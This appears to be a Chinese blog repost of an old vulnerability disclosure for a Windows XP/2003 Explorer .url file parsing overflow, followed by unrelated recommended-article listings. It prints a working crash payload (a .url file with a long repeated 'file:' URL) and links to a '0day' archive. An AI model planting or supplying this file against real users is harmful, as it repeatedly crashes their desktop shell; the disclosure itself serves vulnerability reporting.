最新溢出Windows Explorer URL File format overflow

最新推荐文章于 2025-11-24 17:30:40 发布
原创 最新推荐文章于 2025-11-24 17:30:40 发布 · 1.3k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#file #windows #url #microsoft #parsing #xp

本文披露了一个仅影响Windows XP系统的安全漏洞。该漏洞出现在Windows Explorer处理URL文件时,通过特制的URL文件格式可以触发explorer.exe崩溃。用户在桌面上创建特定格式的Exploit.url文件后会导致系统不断崩溃。

10多天前就拿到了这个漏洞,这次看到bugtraq也公开了

 只在xp下有效

 

Windows Explorer URL File format overflow


Affected Vendor:
Microsoft

Affected Products:
WindowsXP ALL
Windows2003 ALL


Vulnerability Details:

When explorer.exe parsing *.url file which contains a url as follows format will /
cause explorer.exe crash.




if you create the Exploit.url on Desktop

Explorer will Crash...Crash...Crash...Crash...Crash...Crash...


if you will del exploit.url
open taskmgr.exe
open cmd.exe

then cd your desktop

del exploit.url




Exploit:

[InternetShortcut]
url=file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:fi /
le:file:file:file:file:file:file:file:file:file:file:file:


Attachment:
http://hitcon.org/Nanika-desktop_explore_0day.rar
you can drop in desktop :P


http://hitcon.org
http://www.chroot.org

iiprogram
关注
Stack overflow 线程栈溢出异常,程序崩溃在汇编代码 test dword ptr [eax],eax 上的问题排查
dvlinker的技术专栏
07-15 3万+
本文详细讲述线程栈溢出异常,程序崩溃在汇编代码test dword ptr [eax],eax上问题的排查过程。
使用Windbg分析dump文件定位软件异常的方法与操作步骤
热门推荐
dvlinker的技术专栏
03-04 7万+
本文详细讲述了使用Windbg分析dump文件的一般步骤与诸多细节,并给出了一个实战分析实例,有一定的实战参考价值。
GCC多平台编译会遇到小问题
liulilittle的博客
11-20 1520
设置编译器选项,g++ -Wall -Wextra -Wno-error=deprecated-copy -Wno-error=format-overflow= your_file.cpp -o your_program。这个错误表明在你的代码中使用了被废弃的拷贝构造函数。在 C++11 之后,编译器会自动生成默认的拷贝构造函数,但在某些情况下,这种自动生成的拷贝构造函数可能会导致意外的行为,因此被标记为被废弃的。格式化字符串时,写入的字节数超过了目标缓冲区的大小所导致的。这个错误是由于在使用。
Linux安装zookeeper原生C API接口出现的make编译错误
weixin_43604792的博客
01-07 2010
Linux安装zookeeper原生C API接口出现的make编译错误 出现的问题 ./configure之后,然后make,发现出现如图问题 图中出现 [-Werror=format-overflow=]错误 问题分析 我的Linux上安装的gcc版本是8.3.0,编译检测性非常高 zookeeper源码编译生成C函数接口,在./confihure后生成的Makefile文件中,默认是将警告...
系统级性能分析工具perf的介绍与使用
liyu123__的博客
03-26 2542
perf --help之后可以看到perf的二级命令。 序号 命令 作用 1 annotate 解析perf record生成的perf.data文件,显示被注释的代码。 2 archive 根据数据文件记录的build-id,将所有被采样到的elf文件打包。利用此压缩包,可以再任何机器上分析数据文件中记录的采样数据。 3 bench ...
解决 “Power PC S390X 上 C/C++ 正确调用 sprintf %d” 发生编译失败的错误。
liulilittle的博客
08-20 1095
上述代码怎么会发生编译错误并导致停止编译,在其它平台上面这样的代码是可以正确编译的,我们知道:%d 格式符号等价需求 signed int;int 的数值输入。1、不要使用 sprintf 函数,自行单独封装各自的字符串格式化函数,比如 %d 可以由 std::to_string 来代替实现。2、为编译器选项 CXX_FLAGS 增加:-Wno-format-overflow
获取 Windows 系统托盘图标信息的最新方案(三)
溡漪幽博客
02-22 3610
在《获取 Windows 系统托盘图标信息的最新方案(一)》中(下文简称 《最新方案(一)》),我们讨论了在 Win11 22H2 上获取系统托盘图标信息的方法,即拦截 Shell_TrayWnd 窗口的 WM_COPYDATA 消息。在《最新方案(一)》中,我们主要使用 Inline hook 重写 CTray::v_WndProc 函数,也就是窗口过程函数来拦截 WM_COPYDATA 消息。具体分析了两种注入 explorer 的实现方法:(1)创建挂起进程的远程线程注入;
Windows基线自动化检查脚本
凡心所向,素履以往,生如逆旅,一苇以航
12-04 1959
(45) 检查 Simple Mail Transport Protocol (SMTP) 服务状态:确认该服务是否停止。(46) 检查 Windows Internet Name Service (WINS) 服务状态:确认该服务是否停止。(40) 检查是否已启用 TCP 最大传输单元 (MTU) 大小自动探测:确认MTU探测设置。(15) 检查可远程访问的注册表路径:再一次检查远程访问设置(重复检查,实际应为一个检查)。(3) 检查是否已禁用来宾 (Guest) 帐户:检查来宾账户状态是否为禁用。
Windows 固定快捷方式到任务栏
溡漪幽博客
05-18 4309
将应用程序固定到任务栏是 Windows 7 中首次引入的一项功能。自其发明以来,微软(根据 Raymond Chen 的说法)就打算不提供(无限的)编程操作。显然,一些开发人员认为他们的应用程序是世界上最棒的,谁不希望我们的应用程序在安装时固定到任务栏?!目前操作任务栏固定的方法有很多种,这里整理常用的几种方法。
使用Windbg分析dump文件的一般步骤及要点详解
dvlinker的技术专栏
05-25 4万+
通过一个问题实例详细讲解使用Windbg静态分析dump文件的完整过程。
如何让C++程序自动生成dump文件?以及如何分析dump文件?
dvlinker的技术专栏
07-26 763
本文讲述如何让C++程序自动生成dump文件,以及如何分析dump文件。
Powershell指令操作Windows(Windows server)日志
afei001
07-26 1146
     1.Windows日志严重程度分类 有5种类型: (1)Error:错误 (2)Warning:警告 (3)Information:信息 (4)SuccessAudit:审核成功 (5)FailureAudit:审核失败 PS C:\WINDOWS\system32> [enum]::GetNames([System.Diagnostics.EventLogEntryType]) #获取系统日志分类 Error Warning Information SuccessAudit F.
关于overflow
赶路
12-31 1379
gcc支持以下flag: ccflags-y += -fstrict-overflow -Wstrict-overflow=5 ccflags-y += -Wall -Wtype-limits -Wsign-compare ccflags-y += -Wextra   gcc中关于 -fstrict-overflow的介绍 https://gcc.gnu.org/onlined
Python的数据类型
chen_note的博客
11-21 958
Python包含六种核心数据类型: 数字类型 - 不可变类型,支持数学运算 字符串- 不可变文本类型,支持切片、格式化(f-string/%-formatting)和常用方法(split/strip/find等) 列表- 可变有序集合,支持增删改查操作 元组 - 不可变列表,用于函数传参 字典 - 键值对结构,通过key快速查找value 集合 - 去重容器,支持集合运算(并/交/差集) 流程控制包括:条件判断、循环结构、循环控制
Java集合大调研
m0_67398518的博客
11-23 818
Java集合框架主要包含Collection和Map两大接口体系。Collection分为List、Set和Queue;Map存储键值对。各实现类在性能上各有特点:ArrayList随机访问快,LinkedList增删快,HashSet查询快,TreeSet保持排序。线程安全类有Vector和ConcurrentHashMap等。选择时应根据需求考虑访问方式、排序要求和线程安全等因素。
智能玩具新纪元:一个AI能力底座开启创新“加速度”
最新发布
netease_im的博客
11-24 526
我们定义了情感陪伴智能体的演进阶段:E0阶段为被动机械响应的脚本式交互,E1阶段接入文本大模型后,智能体已经具备上下文理解与短期记忆,到E2阶段的多模态情绪识别,再到E3阶段的主动关怀和长期情感记忆,智能体逐渐建立依恋关系,进一步实现稳定的人格与情绪演化,最终达成共生目标。阙杭宁基于在即时通讯领域的十年技术积累与五年的C端少儿产品深度实践,系统阐释了在AI能力底座下,如何实现通讯技术与智能交互的融合创新,构建情感陪伴垂直场景解决方案,以帮助合作伙伴大幅降低AI应用的创新门槛与POC周期。
微软封锁Win11/Office KMS38破解!无法再激活到2038年
std86021的博客
11-24 516
MAS利用KMS的工作原理,通过欺骗GatherOSstate等系统文件,将原本只有180天的KMS离线激活宽限期,延长至2038年1月19日,从而实现接近永久的激活效果。这意味着,对于安装了11月累积更新的Windows 11用户,超过180天的KMS宽限期将被重设为0,未来的KMS授权将固定为180天,必须连接KMS服务器才能完成续期。不过这并不是微软打击非法激活,这次KMS宽限期机制的调整,看起来是微软根据自己的内部规划进行的变动,无意中导致了KMS38激活方式的失效。快科技11月14日消息,近日,
多立场AI Agent系统设计与实现:气候变化态度的叙事影响研究
max500600的博客
11-23 82
本文介绍了一个多立场AI Agent系统的设计与实现,旨在研究不同叙事方式对公众气候变化态度的影响。系统包含四个具有不同叙事立场(积极故事性、积极叙事性、消极故事性、消极信息性)的AI Agent,采用模块化架构设计,包含数据库管理、日志系统和Agent初始化等功能。系统通过自然对话交互收集数据,记录对话轮次、用户档案等信息,为研究气候变化叙事效果提供技术支持。核心代码展示了系统类结构、数据库设计和Agent配置实现。
FF文本溢出处理:text-overflow的终极解决方案
综上所述,文件标题、描述、标签及文件名称列表共同指向了一个具体的问题解决方法,即如何在Firefox浏览器环境下,使用text-overflow属性来处理文本溢出的问题,并且给出了该问题的最新解决方案,帮助开发者提高网站...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值